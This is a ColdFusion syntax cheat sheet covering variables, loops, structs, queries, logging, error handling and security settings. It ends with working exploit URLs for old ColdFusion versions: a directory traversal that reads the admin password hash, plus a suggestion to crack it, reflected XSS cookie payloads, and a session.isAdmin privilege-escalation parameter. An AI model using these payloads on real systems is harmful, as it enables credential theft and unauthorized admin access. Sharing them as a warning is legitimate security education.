Master CF in no-time with these easy to remember (and free to use) CF cheat codes!
You can open the html version on github pages or browse the code in markdown bellow.
Use cfset to create a variable (if it doesn't exist) and assign it a value. You can also use it to call functions.
<cfset currentTime = now() />
<cfset name = "Archi" />
<cfset age = 29 />
<cfset todayDate = "Today is: #now()#" />
<cfset greeting = "Hello " & name />
<cfset dataArray = [dateFormat(now(), "short"), dateFormat(dateadd('d',1,now()), "short"), "Me", 42] />
<cfset dictionary = { today = dateFormat(now(), "short"), tomorrow = dateFormat(dateadd('d', 1, now()), "short"), who = "Me", the_answer_to_life_and_everything_else = 42 } />
<cfdump var = "This is a message for you" />
<cfoutput>This is a message for you</cfoutput>
<cfdump var = "#name#" /> _same as inspect in ruby_
<cfoutput>#name#</cfoutput> _same as puts in ruby_
There are several different types of for and while loops in ColdFusion. For more info please see the docs for cfloop.
for (i=1;i LTE ArrayLen(array);i=i+1) {
WriteOutput(array[i]);
}
x = 0;
while (x LT 5) {
x = x + 1;
WriteOutput(x);
}
//OUTPUTS 12345
x = 0;
do {
x = x+1;
WriteOutput(x);
} while (x LTE 0);
// OUTPUTS 1
struct = StructNew();
struct.one = "1";
struct.two = "2";
for (key in struct) {
WriteOutput(key);
}
//OUTPUTS onetwo
cars = ["Ford","Dodge"];
for (car in cars) {
WriteOutput(car);
}
//OUTPUTS FordDodge
cars = QueryNew("make,model",
"cf_sql_varchar,cf_sql_varchar",
[["Ford", "T"],["Dodge","30"]]);
for (car in cars) {
WriteOutput("Model " & car.model);
}
//OUTPUTS Model TModel 30
This are like dictionaries in Python or hashes in Ruby.
<cfset aGuy = {} />
<cfset batman = {
"first_name" = "Bruno",
"last_name" = "Diaz",
"age" = 42
} />
<cfset aGuy = structNew() />
<cfset aGuy["first_name"] = "Ezequiel" />
<cfset aGuy["last_name"] = "Lopez" />
<cfset todayDate = "Today is: #now()#" />
<cfset greeting = "Hello " & name />
<cfset aGuy.age = 29 />
<cfset aGuy.height = "5' 11\"" />
<cfloop collection = "aGuy" item = "data">
<cfoutput>#aGuy[data]#: #data#</cfoutput>
</cfloop>
Use SQL in coldfusion to retrieve data form a database or enter data in it.
var queryOptions = { datasource: "appMain" };
var data = queryExecute(
"SELECT * FROM users", {}, queryOptions
);
<cfquery name="firstQ" datasource="tsdata.ts24">
SELECT * FROM TestTable
</cfquery>
<cfoutput>
<cfloop query="#firstQ#">
<p><i>myDataAlfa: </i>#firstQ.myDataAlfa# <i>myDataInt: </i>#firstQ.myDataInt#</p>
</cfloop>
<!--- Extra data to get from the query --->
<p>#firstQ.columnlist#</p>
<p>#firstQ.recordcount#</p>
</cfoutput>
<cfquery name="firstQ" datasource="tsdata.ts24">
SELECT * FROM TestTable
</cfquery>
<cfoutput>
<cfloop query="#firstQ#">
<p><i>myDataAlfa: </i>#firstQ.myDataAlfa# <i>myDataInt: </i>#firstQ.myDataInt#</p>
</cfloop>
<!--- Extra data to get from the query --->
<p>#firstQ.columnlist#</p>
<p>#firstQ.recordcount#</p>
</cfoutput>
Use cflog to write a message to a log file.
<cflog file="myAppLog" application="no"
text="User #Form.username# logged on.">
var logDir = expandPath( "/logs/" );
var logs = directoryList(
path = logDir,
listInfo = "name",
filter = "*.log",
type = "file",
recurse = "false"
);
for( var log in logs ){
var fullPath = logDir & log ;
if( fileExists( fullPath ) ){
fileDelete( fullPath );
}
}
component {
// ...
function onError( exception ){
// uLogging error with logbox...
writeOutput( "Writting to error log.." );
logger.error(
"Error occured in application: #exception.message# #exception.detail#"
exception
);
// error page
include "views/error.cfm";
}
}
Security-related settings for Application.cfc file
// Application.cfc
component {
this.name = "myApp";
this.blockedExtForFileUpload = "*";
this.scriptProtect = "all";
this.sessioncookie = {
httpOnly: true,
secure : true
};
}
ColdFusion provides a variety of tools to customize error information and handle errors when they occur.
try {
throw(message="Oops", detail="xyz");
} catch (any e) {
WriteOutput("Error: " & e.message);
rethrow;
} finally {
WriteOutput("I run even if no error");
}
public function onError(required exception, required string eventName)
{
var factory = new App.ExceptionFactory();
var e = factory.getNewException(arguments.eventName, arguments.exception);
if (e.logError()) {
/** we cauld also have a logging cfc etc **/
var loggingFile = new App.SomeLoggingCfc(arguments.eventName, arguments.exception);
loggingFile.commitLog();
}
if (e.debugError()) {}
e.throwException();
}
public ExceptionFactory function getNewException(required string eventName, required exception)
{
return new "App.#exception.type#"(argumentCollection = arguments);
}
public boolean function logError() {}
public boolean function debugError() {}
public function throwException() {}
You can use CFML tags and functions to display or hide debugging and tracing information.
<cfsetting showDebugOutput="No">
<cfquery name="TestQuery" datasource="cfexample" debug>
SELECT * FROM TestTable
</cfquery>
<cfif IsDebugMode()>
<cflog file="MyAppSilentTrace" text="Page: #cgi.script_name#,
completed query MyDBQuery; Query Execution time:
#cfquery.ExecutionTime# Status: #Application.status#">
</cfif>
ColdFusion comments have a similar format to HTML comments but use three dash characters instead of two.
<!--- This is a ColdFusion Comment. Browsers do not receive it. --->
mojo = 1; //THIS IS A COMMENT
/* This is a comment
that can span
multiple lines
*/
ColdFusion had a lot of security vulnerabilities in the past, so stop using older versions!
detailed information about the exploitation of this vulnerability: http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
- open file in browser
http://[server:port]/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en
- copy the hashed password
#Fri Feb 07 05:48:45 PST 2020 rdspassword= password=42DABCDFADADASASAS4891539FASDA11CA5 encrypted=true
- compare with rainbow tables
https://www.dcode.fr/sha1-hash
detailed information about the exploitation of this vulnerability: https://www.securityfocus.com/bid/36046/info-directory-traversal-faq-cve-2010-2861/
- open file in browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm?component=<body%20onload=alert(document.cookie)>
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=getcfcinhtml&name=%3Cbody%20onload=alert(document.cookie)%3E
http://www.example.com:8500/CFIDE/componentutils/cfcexplorer.cfc?method=%3Cbody%20onload=alert(document.cookie)%3E
detailed information about the exploitation of this vulnerability: https://www.petefreitag.com/item/834.cfm
- open any action (that checks session.isAdmin) in browser
http://www.example.com:8500/CFIDE/componentutils/componentdetail.cfm
- append the following to the url
?session.isAdmin=1